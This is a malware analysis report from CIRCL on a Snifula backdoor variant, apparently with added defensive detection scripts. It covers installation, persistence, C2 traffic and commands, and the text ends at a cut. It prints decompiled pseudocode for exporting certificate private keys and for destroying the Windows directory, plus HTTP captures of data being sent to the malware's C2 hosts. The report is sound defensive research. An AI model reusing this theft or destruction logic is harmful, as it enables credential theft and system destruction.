TLP:WHITE

# Malware analysis report of a Backdoor.Snifula variant

CIRCL - Computer Incident Response Center Luxembourg and National CERT of Luxembourg
*41, avenue de la gare, 1611 Luxembourg, Luxembourg*
Electronic address: info@circl.lu; URL: http://www.circl.lu/

Dated: 2012-07-25 (initial version), 2012-07-27 (updated domain intel), 2012-09-12 (updated take-down), 2013-05-29 (public release, TLP:WHITE)

# Abstract

Trojan horses, and particularly information stealing malware, are a prevalent risk in information security. According to Symantec, Snifula is a family of information stealing trojan horses known since 2006, and its developers have enhanced it over the years up to the current version (see the Appendix for a history). The current version is, like its predecessors, not spread very widely, but it has some unusual and underestimated capabilities that go farther than stealing passwords or files from an infected computer. A main ability of the malware is its X.509 certificate stealing functionality, which goes beyond the usual information stealing scenarios and is generally considered a merely theoretical attack in most organizations. This report shows that the threat is real and is being used in targeted attacks, and that the attackers reach this goal using documented Windows functions only.

**Contents**

- I. Introduction
- II. Examined Files
- III. Characteristics of the installation process
- IV. Post-installation and runtime analysis
  - A. Behavior
    - 1. Anti-analysis
    - 2. Pipe communication for Inter Process Communication
    - 3. Registry interaction
    - 4. Network behavior
    - 5. Different actions performed on the network
- V. Static analysis
  - A. Snifula command analysis
  - B. Details about specific commands
    - 1. Certificate stealing
    - 2. Screenshot taking
    - 3. Cookie, History and Internet cache stealing
    - 4. Write executable modules
    - 5. KILL - Corrupt Windows
    - 6. SOCKS server
- VI. Observations
  - A. General observations
  - B. Observations regarding hosts / IP addresses / registrars
- VII. Appendix
  - A. History of Snifula
  - B. VirusTotal results
    - 1. Detections for file 2a7.exe (as of 2012-07-22)
    - 2. Detections for file dump_00E30000.bin
    - 3. Detections for file dump_006D0000.bin
    - 4. Detections for file ctfmreg.dll (as of 2012-07-22)
    - 5. Detections for file ctfmreg64.dll
  - C. Interesting code parts
    - 1. Corrupt Windows
    - 2. Delete URL from URL Cache
  - D. Exports
    - 1. ctfmreg.dll
    - 2. dump_00E30000.bin
  - E. Involved hosts and AS numbers
  - F. Related domain information
  - G. Take-down
    - 1. Registered domains
    - 2. IP addresses

**I. INTRODUCTION**

CIRCL has been involved in an international call to support a foreign CERT with the analysis of this particular malware. We were only handed an MD5 of the malware, which we were able to locate in and download from a malware database. While working with this file, several further files were produced during the different types of analysis. This report aims to give an overview of the entire chain, from installation to operation of the malware.

**II. EXAMINED FILES**

1. File: 2a7.exe
   - (a) Origin: VirusTotal
   - (b) Function: Dropper
   - (c) Checksums
     - i. MD5: eaa5e4f26028c41ba3935a4ac455892c
     - ii. SHA1: 049db2d7030bf7563974a2c25671aef046cabf99
     - iii. SHA-256: 2a72d04024a37413d260c53433309f62e922736fae3b2e321f0cdfcb2927ccf7
2. File: dump_00E30000.bin
   - (a) Origin: Dumped from a segment of 2a7.exe during dynamic analysis
   - (b) Function: DLL, identified to be the decrypted ctfmreg.dll (see 4.)
   - (c) Checksums
     - i. MD5: a6bf4ae086b8d28612de4bc0d7ec4abe
     - ii. SHA1: 2b6b4fbc77553425b00ee3135e2e83386ebd797f
     - iii. SHA-256: e352a6e73b52096da9ef78e09b29f9b4b969264a0cb682a4dc9da976d260d0bd
3. File: dump_006D0000.bin
   - (a) Origin: Dumped from a segment of 2a7.exe during dynamic analysis
   - (b) Function: Installer
   - (c) Checksums
     - i. MD5: d819facd7c980b01bf44ea7efbf6af42
     - ii. SHA1: abfe4e74b345669a0fcd8a34bff9c9a0a7bc9c44
     - iii. SHA-256: f6cc42d577c25192282b4eddff3efebc8efefa4056b6939e14af17fd3e365722
4. File: ctfmreg.dll
   - (a) Origin: File extracted while running dump_006D0000.bin
   - (b) Function: Actual encrypted malware installed and running on a 32 bit Windows system
   - (c) Checksums
     - i. MD5: f9005fd7eb85a81f2f9b1474bba61be0
     - ii. SHA1: 89196b0ed3189e8571924144e57aa867f72164bd
     - iii. SHA-256: 67d8a87c1361b9b3a150f1dcf05082f874ed316fde3aa5311b8b7ff93bbd09f2
5. File: ctfmreg64.dll
   - (a) Origin: File extracted while running dump_006D0000.bin (with binary instrumentation)
   - (b) Function: Actual encrypted malware installed and running on a 64 bit Windows system
   - (c) Checksums
     - i. MD5: edb1c6fa185dc818e9cf1d107974561a
     - ii. SHA1: 383b76f23ac1d469a59a85af1a8d9c1d3f932e2f
     - iii. SHA-256: 4384ec85f5d83e4d8e474e4899098787c513e0a42ff1047a28f5244448dce7f7
6. File: [8 decimal digits from GetTickCount()].bat (example: 41082546.bat)
   - (a) Origin: File dropped while running dump_006D0000.bin
   - (b) Function: Batch file to delete files after installation
   - (c) Checksums for 41082546.bat
     - i. MD5: d226a657b279c5fc0a892748230a56ff
     - ii. SHA1: fa7e4fb6d6de3c4769001cbfce0a00ba02ef28a5
     - iii. SHA-256: 9dae2767b8e3499d37418a75ddd04d457c7ec8d6c8f312ee109c95a8a97e7761

**III. CHARACTERISTICS OF THE INSTALLATION PROCESS**

[Figure: relation between the examined files. dump_00E30000.bin (memory, decrypted) and ctfmreg.dll (filesystem, encrypted) are the decrypted and encrypted versions of the same file.]

- File 2a7.exe (dropper) runs dump_006D0000.bin, which drops, depending on the underlying Windows environment, either the file ctfmreg.dll on a 32 bit system or ctfmreg64.dll on a 64 bit system into the directory `c:\windows\system32\`, then decrypts and loads it into memory (which was dumped as dump_00E30000.bin).
- The file is registered in `HKLM\System\CurrentControlSet\Control\Session Manager\AppCertDlls\` on 32 bit Windows environments with the key:value pair `mmcpapir : c:\windows\system32\ctfmreg.dll`, or with the following pair on 64 bit Windows environments: `mmcpapir : c:\windows\system32\ctfmreg64.dll`.
- Initial startup is triggered via ShellExecute on `rundll32.exe ctfmreg.dll,CreateProcessNotify`. Interestingly, analysis of the file ctfmreg.dll shows a list of 46 exported functions, of which solely this CreateProcessNotify is left after the internal decryption process. A possible intention of the malware author(s) might be to make the library look unsuspicious. On the other hand, the list of exports in this particular, unique combination qualifies well as a detection signature. The false positive rate has not been evaluated, though.
- The file 41082546.bat (example filename) is started last. The filename is based on GetTickCount as input for `%lu.bat`, where `%lu` is a format string. It removes the installation file and itself.
- The following pseudo code illustrates the process:

```c
DWORD __stdcall main(const CHAR *cmdLine)
{
    HMODULE_1 = GetModuleHandleA(0);
    HMODULE_0 = GetModuleHandleA(0);
    WindowsVersion = GetVersion();
    current_process_id = GetCurrentProcessId();
    shell_execute(cmdLine);
    pMem = 0;
    memset(&v13, 0, 0x18u);
    if (call_QueryInformationToken(&pMem))
    {
        if ...
        if (write_ctfmreg_dll())
        {
            EventAttributes.nLength = 12;
            EventAttributes.bInheritHandle = 0;
            if ...
            HEVENT = CreateEventA(&EventAttributes, TRUE, FALSE, lpName);
            if (HEVENT)
            {
                SetEvent(HEVENT);
                Sleep(2000u);
                ResetEvent(HEVENT);
                CloseHandle(HEVENT);
                HRSRC32 = FindResourceA(0, "CLIENT32", 0xA);
                if (HRSRC32)
                    inject_decrypted_resource_into_browser(HRSRC32, 0x10);
                if (check_wow64(current_process_id))
                {
                    HRSRC64 = FindResourceA(0, "CLIENT64", 0xA);
                    if (HRSRC64)
                        inject_decrypted_resource_into_browser(HRSRC64, 0x18);
                }
                HTIMER = CreateWaitableTimerA(&EventAttributes, TRUE, lpTimerName);
                if ...
                LocalFree(EventAttributes.lpSecurityDescriptor);
                ret = 0;
            }
        }
    }
    create_write_execute_batch_file();
    if (ret == -1)
        ret = GetLastError();
    return ret;
}
```

**IV. POST-INSTALLATION AND RUNTIME ANALYSIS**

**A. Behavior**

*1. Anti-analysis*

After the installation as described in section III, ctfmreg.dll is loaded into explorer.exe. It ensures that ctfmreg.dll is loaded into every process that is started on the infected computer and by doing so prevents basic investigation methods by not allowing various programs to start, like Sysinternals procmon.exe:

"Procmon was unable to allocate sufficient memory to run. Try increasing the size of your page file."

It also ensures that only Internet Explorer or Mozilla Firefox are used as a browser. Other browsers, particularly the following, are terminated during startup:

- Opera
- Safari
- Chrome

*2. Pipe communication for Inter Process Communication*

At this point in time, a communication pipe is established on the system.
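Before the pipe details, a host-side check for the persistence step of section III. The following Python script is an added example and not part of the CIRCL report: it parses a Windows registry export (the text a `reg export` of the key produces) and audits every entry under AppCertDlls. DLLs listed there are loaded into every process that calls the CreateProcess family of APIs and are expected to export CreateProcessNotify, which the loader invokes; that is why this one export is all the malware needs to keep. The embedded .reg text is constructed: it mirrors the `mmcpapir` value documented above and adds a made-up, allowlisted entry (`vendor_hook`, a hypothetical name and path) to show how site-specific exceptions are handled.

```python
"""Audit AppCertDlls entries in a Windows .reg export for Snifula-style persistence."""
import re

# Constructed .reg export (not taken from the report). "mmcpapir" mirrors the
# value the report documents; "vendor_hook" is an invented, allowlisted entry.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager]
"CriticalSectionTimeout"=dword:00278d00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls]
"mmcpapir"="c:\\windows\\system32\\ctfmreg.dll"
"vendor_hook"="C:\\Program Files\\ExampleVendor\\hook.dll"
"""

APPCERTDLLS_KEY = r"hkey_local_machine\system\currentcontrolset\control\session manager\appcertdlls"
KNOWN_BAD_NAMES = {"ctfmreg.dll", "ctfmreg64.dll"}          # DLL names from the report
ALLOWLIST = {r"c:\program files\examplevendor\hook.dll"}    # hypothetical, site-specific


def parse_reg(text: str) -> dict:
    """Parse a .reg export into {key_path_lower: {value_name: value}}.

    String values ("name"="...") are unescaped; other value types are kept raw.
    """
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys[current] = {}
            continue
        if current is None:
            continue
        m = re.match(r'^(@|"((?:[^"\\]|\\.)*)")=(.*)$', line)
        if not m:
            continue
        name = "@" if m.group(1) == "@" else m.group(2)
        raw = m.group(3)
        if raw.startswith('"') and raw.endswith('"'):
            value = re.sub(r'\\(["\\])', r"\1", raw[1:-1])   # .reg escapes \ and " with \
        else:
            value = raw
        keys[current][name] = value
    return keys


def audit_appcertdlls(text: str) -> list:
    """Return (value_name, dll_path, verdict) for every entry under AppCertDlls."""
    findings = []
    for name, path in parse_reg(text).get(APPCERTDLLS_KEY, {}).items():
        norm = path.lower()
        base = norm.rsplit("\\", 1)[-1]
        if base in KNOWN_BAD_NAMES:
            verdict = "known Snifula DLL name"
        elif norm in ALLOWLIST:
            verdict = "allowlisted"
        else:
            verdict = "unknown AppCertDlls entry, review"
        findings.append((name, path, verdict))
    return findings


if __name__ == "__main__":
    for name, path, verdict in audit_appcertdlls(SAMPLE_REG):
        print(f"{verdict:36} {name} -> {path}")
```

On most hosts the AppCertDlls key is absent or empty, so any entry at all deserves a look, not only the two file names known from this sample; `reg export` typically writes UTF-16 text, so decode the file with the matching encoding before passing it in.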
The pipe is part of the Inter Process Communication schema of the malware and is used to execute commands. The pipe is built with this format string:

```
\\.\pipe\{%08x-%04x-%04x-%04x-%08x%04x}
```

It was constant during our investigation. Nevertheless, there is an initialization factor that might change. In our tests the pipe's name was the following:

```
{370a98c4-cd53-7296-38fd-ec812a37fe5b}
```

This pipe can be enumerated as a host signature, e.g. with Sysinternals pipelist.

*3. Registry interaction*

The following registry keys are set up in `HKEY_CURRENT_USER\Software\AppDataLow\{dd2706e2-58d9-ec64-3673-ca57d81d8ca1}`:

- key 'k1' with a 4 byte value reflecting the user id, which is created using the Windows API function CoCreateGuid()
- key 'k2' with a 4 byte value which doesn't seem to be used within this component
- key 'Version' with the version number (currently 0x0c = 12)
- key 's1' with a 4 byte value which is created/used when the SOCKS functionality is turned on

*4. Network behavior*

The network functions only become active once a browser is opened. Immediately when a browser is opened, the following hosts are queried with HTTP POSTs:

- wednesltr.com.tw
- masmitnd.com.tw
- financepfrro.com.tw

Two backup IP addresses are also in the binary, but were not seen being queried:

- 200.46.204.8
- 95.143.198.47

*5. Different actions performed on the network*

1. Upload of X.509 certificates: a function opens the certificate store, enumerates and exports all certificates including the private keys, encrypts them with the password 'password', compresses the file and sends it over the network:

```http
POST http://wednesltr.com.tw/uda
Content-Type: multipart/form-data; boundary=---------------------------1d7248c1d7248c1d7248c
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0
Host: wednesltr.com.tw
Content-Length: 246335
Connection: keep-alive

Multipart form
Form data:
  upload_file: PK..........@.J.$(...........AuthRoot.pfxUT...A.O.A.O.A.O.7...0.......0.....?*.H...............0....0.....?*.H..........0.......0.....?*.H..[...]
```

(The upload is binary data, rendered as ASCII: a zip archive whose first member is AuthRoot.pfx.)

2. Upload of basic environment information:

```http
POST http://wednesltr.com.tw/uda
Content-Type: multipart/form-data; boundary=---------------------------1d7248c1d7248c1d7248c
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0
Host: wednesltr.com.tw
Content-Length: 641
Connection: keep-alive

Multipart form
Form data:
  upload_file:
    OS: Microsoft Windows XP Professional Service Pack 3 (build: 2600)
    ARCH: x86 32 bit
    USER: Admin
    user_id: 153958625
    version_id: 12
    sys: 1
```

(a) The server simply replies with 'ok!'.

3. Upload of basic software information:

```http
POST http://masmitnd.com.tw/ping
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0
Host: masmitnd.com.tw
Content-Length: 64
Connection: keep-alive

URLEncoded form
  user_id: 153958625
  version_id: 12
  socks: 0
  build: 32940
  crc: 00000000
```

(a) The server returns a file which appears to be a configuration file, gzip compressed and encrypted. This file also contains new instructions.

4. Ask for command:

```http
POST http://wednesltr.com.tw/ucommd
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0
Host: wednesltr.com.tw
Content-Length: 64
Connection: keep-alive

URLEncoded form
  user_id: 153958625
  version_id: 12
  socks: 0
  build: 32940
  crc: 00000000
```

(a) This HTTP POST request is executed regularly in a separate thread. It asks for a new command from the server; the response is evaluated and executed on the infected system. A complete list of possible commands is shown in the following chapter.

**V. STATIC ANALYSIS**

**A. Snifula command analysis**

External commands received via HTTP can be:

- EXE (261)
- DL_EXE (262)
- DL_EXE_ST (263)
- CLEAR_COOK (267)
- VER (-)
- REBOOT (259)
- KILL (264)
- GET_CERTS (265)
- GET_COOKIES (266)
- SOCKS_START (271)
- SOCKS_STOP (270)
- GET_LOG (-)

These external commands are translated into internal commands. The control is set up to be performed via a named pipe. The number in brackets is the corresponding internal command sent via the named pipe to the receiving function. The malware uses the browser API to communicate with the servers; here it uses the functionality of DeleteUrlCacheEntry() to delete the used URLs from the browser cache and so remove traces. The internal commands are:

- 271: SOCKS start
- 270: SOCKS stop
- 258: Find files (threaded)
- 259: Reboot Windows
- 260: Write file
- 261: Write executable module and execute
- 262: Write executable module
- 263: Write executable module and make it autostart
- 264: Corrupt Windows directory and reboot computer
- 265: Start certificate stealing thread
- 266: Start cookie stealing thread
- 267: Copy Cookies, History and Internet Cache files
- 268: Write log
- 269: Read log

Some of the internal commands are not mapped to external commands, or they are part of an external command.

**B. Details about specific commands**

*1. Certificate stealing*

The certificates of the certificate stores (shown in the following listing) are exported, including their private key.
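The beacon and upload patterns documented in sections IV.A.4 and IV.A.5 can be turned into a network-side detection. The following Python script is an added example and not part of the CIRCL report: it parses raw HTTP requests, flags POSTs to the three C2 hosts, recognises the fixed `user_id`/`version_id`/`socks`/`build`/`crc` field set sent to `/ping` and `/ucommd`, and for `/uda` uploads inspects whether the `upload_file` part is a zip archive whose `.pfx` members are named after the Windows certificate stores the certs_thread routine exports (the capture above shows `AuthRoot.pfx` as the first member). The sample requests are constructed here from the captures shown above; the zip contains placeholder bytes, not real PFX data, and nothing is sent on the network.

```python
"""Detect Snifula beacon POSTs and staged certificate-store uploads in raw HTTP requests."""
import io
import re
import zipfile
from urllib.parse import parse_qs

# Indicators from the report: C2 hosts, the fixed beacon field set sent to
# /ping and /ucommd, and the certificate store names exported by certs_thread.
C2_HOSTS = {"wednesltr.com.tw", "masmitnd.com.tw", "financepfrro.com.tw"}
BEACON_FIELDS = {"user_id", "version_id", "socks", "build", "crc"}
CERT_STORES = {"My", "AddressBook", "AuthRoot", "CertificateAuthority",
               "Disallowed", "Root", "TrustedPeople", "TrustedPublisher"}


def parse_request(raw: bytes):
    """Split a raw HTTP request into (method, host, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # The captures use absolute-form targets (http://host/path); fall back to Host otherwise.
    m = re.match(r"https?://([^/]+)(/.*)", target)
    host, path = (m.group(1), m.group(2)) if m else (headers.get("host", ""), target)
    return method, host, path, headers, body


def multipart_parts(body: bytes, content_type: str):
    """Yield (field_name, payload) for each part of a multipart/form-data body."""
    m = re.search(r"boundary=([^;]+)", content_type)
    if not m:
        return
    delim = b"--" + m.group(1).strip().encode()
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter reached
            break
        part_head, _, payload = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        if payload.endswith(b"\r\n"):        # CRLF that precedes the next delimiter
            payload = payload[:-2]
        name = re.search(rb';\s*name="([^"]*)"', part_head)
        yield (name.group(1).decode() if name else ""), payload


def exported_stores(payload: bytes) -> set:
    """Certificate store names found as .pfx members of a zip payload (empty set if not a zip)."""
    if not payload.startswith(b"PK\x03\x04"):
        return set()
    try:
        with zipfile.ZipFile(io.BytesIO(payload)) as zf:
            names = zf.namelist()
    except zipfile.BadZipFile:
        return set()
    return {n[:-4] for n in names if n.lower().endswith(".pfx")} & CERT_STORES


def classify(raw: bytes) -> list:
    """Return the detections for one HTTP request (empty list = nothing matched)."""
    method, host, path, headers, body = parse_request(raw)
    findings = []
    if method != "POST":
        return findings
    if host in C2_HOSTS:
        findings.append(f"known C2 host {host}")
    ctype = headers.get("content-type", "")
    if path in ("/ping", "/ucommd") and ctype.startswith("application/x-www-form-urlencoded"):
        if set(parse_qs(body.decode("latin-1"), keep_blank_values=True)) == BEACON_FIELDS:
            findings.append(f"beacon form fields on {path}")
    if path == "/uda" and ctype.startswith("multipart/form-data"):
        for name, payload in multipart_parts(body, ctype):
            if name != "upload_file":
                continue
            stores = exported_stores(payload)
            if stores:
                findings.append("certificate store export: " + ", ".join(sorted(stores)))
            elif payload.startswith(b"OS:"):
                findings.append("environment info upload")
    return findings


# ---- constructed sample traffic, modelled on the captures in the report ----
BOUNDARY = "---------------------------1d7248c1d7248c1d7248c"
MULTIPART = f"multipart/form-data; boundary={BOUNDARY}"


def _build_pfx_zip() -> bytes:
    """Stand-in for the staged archive: one dummy .pfx per store, placeholder bytes only."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for store in ("My", "AuthRoot", "Root"):
            zf.writestr(f"{store}.pfx", b"\x30\x82placeholder-not-a-real-pfx")
    return buf.getvalue()


def _request(host: str, path: str, ctype: str, body: bytes) -> bytes:
    head = (f"POST http://{host}{path} HTTP/1.1\r\nContent-Type: {ctype}\r\n"
            "User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0\r\n"
            f"Host: {host}\r\nContent-Length: {len(body)}\r\nConnection: keep-alive\r\n\r\n")
    return head.encode() + body


def _upload(payload: bytes) -> bytes:
    return (f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="upload_file"; filename="f"\r\n'
            "Content-Type: application/octet-stream\r\n\r\n").encode() + payload + f"\r\n--{BOUNDARY}--\r\n".encode()


SAMPLES = {
    "cert_upload": _request("wednesltr.com.tw", "/uda", MULTIPART, _upload(_build_pfx_zip())),
    "env_info": _request("wednesltr.com.tw", "/uda", MULTIPART, _upload(
        b"OS: Microsoft Windows XP Professional Service Pack 3 (build: 2600)\r\nARCH: x86 32 bit\r\n"
        b"USER: Admin\r\nuser_id: 153958625\r\nversion_id: 12\r\nsys: 1")),
    "ping": _request("masmitnd.com.tw", "/ping", "application/x-www-form-urlencoded",
                     b"user_id=153958625&version_id=12&socks=0&build=32940&crc=00000000"),
    "benign": _request("example.invalid", "/login", "application/x-www-form-urlencoded",
                       b"user=alice&token=abc"),
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(f"{label:12} -> {classify(raw) or ['no match']}")
```

Feed it request bytes from a proxy log or a reassembled TCP stream. The field-set check is the part that survives a change of C2 domain, since the five form keys and their order are compiled into the bot; the multipart parser is deliberately minimal (no nested multipart, no quoted boundaries), which is enough for the captures in this report.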
This is done in the function export_certificates:

```c
PFXExportCertStoreEx(HCERTSTORE, &pPFX, L"password", 0, EXPORT_PRIVATE_KEYS)
```

This exports the given certificate store, including the private keys, encrypting it with the password 'password'.

```c
DWORD __stdcall certs_thread(int a1)
{
    temp = make_temp_file();
    if (temp)
    {
        DeleteFileA(temp);
        if (CreateDirectoryA(temp, 0))
        {
            export_certificates("My", temp);
            export_certificates("AddressBook", temp);
            export_certificates("AuthRoot", temp);
            export_certificates("CertificateAuthority", temp);
            export_certificates("Disallowed", temp);
            export_certificates("Root", temp);
            export_certificates("TrustedPeople", temp);
            export_certificates("TrustedPublisher", temp);
            error = create_file_and_add_to_send_list(temp, 1);
            file_operations(temp, 1, 1);
            RemoveDirectoryA(temp);
        }
        else
        {
            error = GetLastError();
        }
        HeapFree(hHeap, 0, temp);
    }
    else
    {
        error = 1006;
    }
    pFile = HeapAlloc(hHeap, 0, 0x400u);
    wsprintfA(pFile, "Certs ended with status %u\n", error);
    size_file = lstrlenA(pFile);
    pipe_process_command(size_file, 268, pFile);
    HeapFree(hHeap, 0, pFile);
    return error;
}
```

The certificate files are archived and compressed into a temporary file of the format `[16 hex characters].tmp`; they are written to `C:\Documents and Settings\\Local Settings\Temp`. Subsequently, another thread collects and uploads these files periodically; it is started within this function: `create_thread_collect_upload_files()`

*2. Screenshot taking*

The malware contains functionality to take screenshots from the infected computer. In contrast to the outlined control schema via HTTP embedded commands from section V.A, the screenshot taking command is embedded within the encrypted file returned to the /ping command (see section IV.A.5.2). A screenshot is taken when the file contains the command "SCREEN SHOT". The screenshot file is then uploaded.

*3. Cookie, History and Internet cache stealing*

The malware collects all browser history and cache files from the browser folder and collects cookie files from Internet Explorer, Firefox and Macromedia Flash Player. The files are assembled and uploaded.

*4. Write executable modules*

The malware can retrieve an additional executable file and either

- save it to `\[filename].exe`, where filename is the decimal unsigned long representation of the result of GetTickCount()
- save and run it
- save and make it autostart via `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`

*5. KILL - Corrupt Windows*

When the malware receives the 'KILL' command, the inode of the Windows directory is overwritten with the malware module and a reboot is triggered. Overwriting the Windows directory renders the Windows installation unusable.

*6. SOCKS server*

The malware is able to create a reverse connection to a server on the internet and is thereby able to act as a proxy server for the attacker. This functionality can be turned on dynamically on request.

**VI. OBSERVATIONS**

**A. General observations**

This is a list of general observations regarding the capabilities of this malware:

- Internet connections are proxy capable. Even usernames and passwords are read from the current browser configuration.
- The combination of history stealing (targets), cookies (authentication information), X.509 certificates (strong authentication) and acting as a proxy server for the attacker is considered a high risk and a serious threat to the confidentiality of information that is usually heavily protected and only accessible from defined networks.
- The malware uses threads, Windows events, asynchronous procedure calls and Windows pipe communication and appears to be well written in terms of design and implementation, including error handling.
- The malware writer(s) left a string of the build environment within the binary, which could be used for signatures: `C:\tmp\NRM-27_01_12\PDB\client_x32.pdb`
- The encrypted file returned following the /ping command needs a deeper investigation, because it could contain more functionality that is not covered in this analysis; this could be done in related future work.

**B. Observations regarding hosts / IP addresses / registrars**

The attacker has left a few traces by registering domains and using IP addresses. The network registry information is included in the Appendix and does not give any specific hints about the attacker, except that he has or had access to different hosts at IP addresses in various places in the world:

- CAT Telecom Public Company Ltd, Thailand
- Hurricane Electric, Inc., USA
- AltNet, IP Kolobov Aleksandr Grigorievich, Ukraine
- HUB.ORG, Panama
- SERVERCONNECT, Sweden

The domain registry information includes some interesting details that are worth mentioning here. The domains included in the binary,

- wednesltr.com.tw
- masmitnd.com.tw
- financepfrro.com.tw

share common elements: they were all registered on the same day by the same "person" at the same registrar:

```
Registrant:
   Aster Ltd
   Lu Bing-hsian  aster@gmail.com
   +86.8457434354
   +86.8457434354
   No. 8, JiaXing Road, Antes Economic & Technological Development Area, Yantai, Shandong, China
   YanTai, ShanDong
   CN

Administrative Contact:
   Lu Bing-hsian  aster@gmail.com
   +86.8457434354
   +86.8457434354

Technical Contact:
   Lu Bing-hsian  aster@gmail.com
   +86.8457434354
   +86.8457434354

Record expires on 2013-03-06 (YYYY-MM-DD)
Record created on 2012-03-06 (YYYY-MM-DD)

Domain servers in listed order:
   ns3.cnmsn.com
   ns4.cnmsn.com

Registration Service Provider: WebCC Ltd.
```

Interestingly, there are around 40 domains listed at domaintools.com which are all registered with the email address 'aster@gmail.com'. It would be no surprise if those domains were also used for malicious activities. These domains are included in the Appendix.

**VII. APPENDIX**

**A. History of Snifula**

- 2006 - Infostealer.Snifula.A: http://www.symantec.com/security_response/writeup.jsp?docid=2006-072610-2145-99&tabid=2
- 2006 - Infostealer.Snifula.B: http://www.symantec.com/security_response/writeup.jsp?docid=2006-110710-2700-99&tabid=2
- 2007 - Infostealer.Snifula.C: http://www.symantec.com/security_response/writeup.jsp?docid=2007-051005-4518-99&tabid=2
- 2012 - Backdoor.Snifula.D: http://www.symantec.com/security_response/writeup.jsp?docid=2012-062203-0431-99&tabid=2

**B. VirusTotal results**

*1. Detections for file 2a7.exe (as of 2012-07-22)*

```
nProtect: Trojan.Generic.7361643
McAfee: Artemis!EAA5E4F26028
K7AntiVirus: Trojan
TheHacker: Trojan/Dropper.Injector.disx
VirusBuster: Trojan.DR.Injector!wZtuXJUqECU
NOD32: a variant of Win32/Kryptik.ACYX
F-Prot: W32/Trojan2.NQMQ
Symantec: WS.Reputation.1
Norman: W32/Injector.ACVI
TrendMicro-HouseCall: TROJ_SPNR.16CI12
Avast: Win32:Dropper-KLC [Drp]
Kaspersky: Trojan-Dropper.Win32.Injector.disx
BitDefender: Trojan.Generic.7361643
Emsisoft: Trojan-Dropper.Win32.Injector!IK
Comodo: UnclassifiedMalware
F-Secure: Trojan.Generic.7361643
VIPRE: Trojan.Win32.Generic.pak!cobra
AntiVir: TR/Drop.Injector.disx
TrendMicro: TROJ_SPNR.16CI12
McAfee-GW-Edition: Artemis!EAA5E4F26028
Sophos: Troj/FakeAV-FGJ
GData: Trojan.Generic.7361643
Commtouch: W32/Trojan2.NQMQ
AhnLab-V3: Dropper/Win32.Injector
VBA32: TrojanDropper.Injector.disx
Ikarus: Trojan-Dropper.Win32.Injector
Fortinet: W32/Injector.DISX!tr
AVG: Dropper.Generic5.BODG
Panda: Generic Trojan

Scanned: 2012-04-19 12:29:10 - 42 scans - 29 detections (69.0%)
```

*2. Detections for file dump_00E30000.bin*

No detections (as of 2012-07-22)

*3. Detections for file dump_006D0000.bin*

No detections (as of 2012-07-22)

*4. Detections for file ctfmreg.dll (as of 2012-07-22)*

```
McAfee: Generic PWS.y!d2z
K7AntiVirus: Riskware
TheHacker: Trojan/Kryptik.wrl
VirusBuster: Trojan.Kryptik!WjiRK5FHsos
NOD32: a variant of Win32/Kryptik.WRL
F-Prot: W32/Agent.IV.gen!Eldorado
Norman: W32/Suspicious_Gen4.VNDC
Avast: Win32:Kryptik-IAQ [Trj]
Kaspersky: Backdoor.Win32.Papras.fgi
Comodo: UnclassifiedMalware
VIPRE: Trojan.Win32.Generic!BT
AntiVir: TR/Spy.Ursnif.89
McAfee-GW-Edition: Generic PWS.y!d2z
Emsisoft: Trojan-Spy.Win32.Ursnif!IK
Microsoft: TrojanSpy:Win32/Ursnif
GData: Win32:Kryptik-IAQ
Commtouch: W32/Agent.IV.gen!Eldorado
AhnLab-V3: Backdoor/Win32.Papras
Ikarus: Trojan-Spy.Win32.Ursnif
Fortinet: W32/FakeAV.FGJ!tr
AVG: Crypt.ARZV

Scanned: 2012-05-03 16:25:11 - 40 scans - 21 detections (52.0%)
```

*5. Detections for file ctfmreg64.dll*

No detections (as of 2012-07-22)

**C. Interesting code parts**

*1. Corrupt Windows*

```c
CHAR *__usercall corrupt_windows(DWORD this, int a2)
{
    CHAR *windows_directory;                // eax@1 MAPDST
    LPSTR pStr;                             // eax@2
    const CHAR *dir_without_drive_letter;   // esi@2
    HANDLE hFileWindowsDirectory;           // esi@2
    HMODULE hInstance;                      // eax@3
    BOOL success;                           // ebp@3
    void *v9;                               // ecx@3
    DWORD NumberOfBytesWritten;             // [sp+0h] [bp-4h]@1

    NumberOfBytesWritten = this;
    windows_directory = HeapAlloc(hHeap, 0, MAX_PATH);
    if (windows_directory)
    {
        GetWindowsDirectoryA(windows_directory, MAX_PATH);
        pStr = StrChrA(windows_directory, ':');
        pStr[1] = 0;
        dir_without_drive_letter = pStr + 2;
        wsprintfA(pStr + 2, "\\\\.\\%s", windows_directory);   // '\\.\windows'
        hFileWindowsDirectory = CreateFileA(dir_without_drive_letter, RW_ALL, 3u, 0, OPEN_EXISTING, 0, 0);
        if (hFileWindowsDirectory != -1)
        {
            hInstance = GetModuleHandleA(0);   // GetModuleHandle(0) gives a hInstance
            success = WriteFile(hFileWindowsDirectory, hInstance, 0x10000u, &NumberOfBytesWritten, 0);
            CloseHandle(hFileWindowsDirectory);
            if (success)
                reboot_windows(v9);
        }
        windows_directory = HeapFree(hHeap, 0, windows_directory);
    }
    return windows_directory;
}
```

*2. Delete URL from URL Cache*

```c
